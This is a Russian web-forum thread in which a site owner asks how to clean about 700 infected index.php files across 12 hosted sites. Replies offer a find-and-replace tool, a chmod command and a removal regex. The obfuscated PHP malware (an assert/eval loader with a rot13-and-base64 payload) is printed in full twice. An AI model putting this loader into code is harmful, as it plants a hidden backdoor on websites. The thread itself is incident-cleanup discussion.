0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 2140 Просмотров
*

V1RTUS

  • Осваиваюсь на форуме
  • 189
  • 0
У меня на хостинге в аккаунте 12 сайтов, все они разом заразились вирусником, все файлы index.php содержат вредоносный код, хостинг заблокировал отправку писем, над это срочно решать,  имею список зараженных файлов, но их там 700 штук, вручную очень долго, есть другой способ ?

Зараза вот такая
Код
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzEyAGR2AGqyBGOyAzMyMQywLzSzLzSvLJRlLmx4AmOuVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwRjBF4lZmLhBQRhZGNkVvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPWxMGHkAwH3MGxjMGMzMJD5L2WuMzWuLzSuZzZ5BQpjLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkZQxhZwZ2YwtkYwRjZIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwt1BTWuMQSuVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

так же права на файл меняются, становятся доступны для  изменения всем
« Последнее редактирование: 08.06.2016, 18:22:48 от V1RTUS »
*

draff

  • Практически профи
  • 2776
  • 172
  • step by step
Re: Как очистить сайт от вируса?
« Ответ #1 : 08.06.2016, 18:53:02 »
Скрипт для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace
Удалю вирус с сайта. Тема в коммерческом разделе
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

V1RTUS

  • Осваиваюсь на форуме
  • 189
  • 0
Re: Как очистить сайт от вируса?
« Ответ #2 : 08.06.2016, 18:55:43 »
Скрипт для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace

Вы прям спаситель) а то уже думал как столько гигов качать, чтобы чистить.

Вопрос 2, как выставить нужные права теперь файлам Index.php, есть нечто подобное?
*

winstrool

  • Завсегдатай
  • 773
  • 42
  • Свободен для работы
Re: Как очистить сайт от вируса?
« Ответ #3 : 08.06.2016, 19:20:14 »
в консоли find ./ -type f -name "index.php" -exec chmod 0444 {} \;
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям
*

V1RTUS

  • Осваиваюсь на форуме
  • 189
  • 0
Re: Как очистить сайт от вируса?
« Ответ #4 : 08.06.2016, 19:50:01 »
Спасибо, последний вопрос с помощною скрипта весь текст найти не находит, отдельны слова получаются, там возможно искать с помощью масок, но так и не понял как(
помогите подготовить мой текст для запроса.
*

wishlight

  • Профи
  • 3634
  • 223
  • skype aqaus.com
Re: Как очистить сайт от вируса?
« Ответ #5 : 08.06.2016, 21:56:02 »
Сперва сайты изолируйте от друг друга, если хостинг этого не предусмотрел. Чтобы из директории одного сайта нельзя было выполнить код в другом. А потом уже лечите.

Данный код только следствие заражения. Надо еще закрыть дыры и убрать бекдоры.
*

V1RTUS

  • Осваиваюсь на форуме
  • 189
  • 0
Re: Как очистить сайт от вируса?
« Ответ #6 : 08.06.2016, 22:02:10 »
Сперва сайты изолируйте от друг друга, если хостинг этого не предусмотрел. Чтобы из директории одного сайта нельзя было выполнить код в другом. А потом уже лечите.

Данный код только следствие заражения. Надо еще закрыть дыры и убрать бекдоры.
Как это делается? я был бы рад узнать, я про изоляцию сайтов друг от друга, если честно я года 2 назад у хостинга спрашивал, когда впервые вставлял второй сайт в один аккаунт, мне сказали типа зависимости нет.. а тут вон оно как оказалось(
*

V1RTUS

  • Осваиваюсь на форуме
  • 189
  • 0
Re: Как очистить сайт от вируса?
« Ответ #8 : 10.06.2016, 01:39:45 »
Ребята помогите а

Поиск в FAR устроен как у обычного текстового редактора, есть поле Текст поиска и Текст замены, если отметить Искать по маске, то можно будет использовать регулярные выражения в поле Текст поиска, также появится чекбокс Учитывать регистр и кнопка Экранировать, если отметить Учитывать регистр то фразы php и pHp будут считаться не одним и тем же. Кнопка Экранировать поможет в построении маски, например, нужно найти все, что начинается на:
<iframe height="100" width="100" style="border: 0">
и заканчивается на:
</iframe>
чтоб не думать какие символы экранировать, просто нажмите кнопку, получится:
\<iframe height\="100" width\="100" style\="border\: 0"\>\<\/iframe\>
дальше добавьте метасимволы регулярного выражения, например:
\<iframe height\="100" width\="100" style\="border\: 0"\>.*?\<\/iframe\>
и начните поиск.


Моя задача найти этот кода, я жестко туплю, никак не выходит(

Код
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVzEyAGR2AGqyBGOyAzMyMQywLzSzLzSvLJRlLmx4AmOuVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwRjBF4lZmLhBQRhZGNkVvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPWxMGHkAwH3MGxjMGMzMJD5L2WuMzWuLzSuZzZ5BQpjLFVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkZQxhZwZ2YwtkYwRjZIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwt1BTWuMQSuVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

как должен выглядеть запрос? Прямой ввод искаемого текста не дает результатов, искать от и до я пытался, но видимо не верно пытался.
*

V1RTUS

  • Осваиваюсь на форуме
  • 189
  • 0
Re: Как очистить сайт от вируса?
« Ответ #9 : 12.06.2016, 01:02:27 »
РЕШЕНИЕ
используете скрипт  для поиска и замены текста Find and Replace
http://secu.ru/scripts/find-and-replace

ПОИСК ДЛЯ ЗАПРОСА
\<\?php([\s]*)\/\/###\=CACHE START\=###.*?\/\/###\=CACHE END\=###([\s]*)\?\>

СТАВИТЕ НУЖНЫЕ ПРАВА
в консоли find ./ -type f -name "index.php" -exec chmod 0444 {} \;

Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

На протяжении месяца постоянно взламывают сайт

Автор kaaaaaljan

Ответов: 4
Просмотров: 374
Последний ответ 17.07.2017, 21:36:10
от Sulpher
Помогите вылечить сайт от вирусов

Автор Victor333

Ответов: 26
Просмотров: 533
Последний ответ 15.06.2017, 18:35:15
от Миха1211
Не выводятся материалы ZOO. После вируса

Автор nuclearacid

Ответов: 1
Просмотров: 152
Последний ответ 29.05.2017, 21:48:36
от robert
Атака на сайт?

Автор yura88851

Ответов: 7
Просмотров: 746
Последний ответ 30.03.2017, 22:40:00
от yura88851
Как заблокировать ломящихся на сайт нехороших людей?

Автор radist_z

Ответов: 24
Просмотров: 402
Последний ответ 26.03.2017, 22:49:54
от ProtectYourSite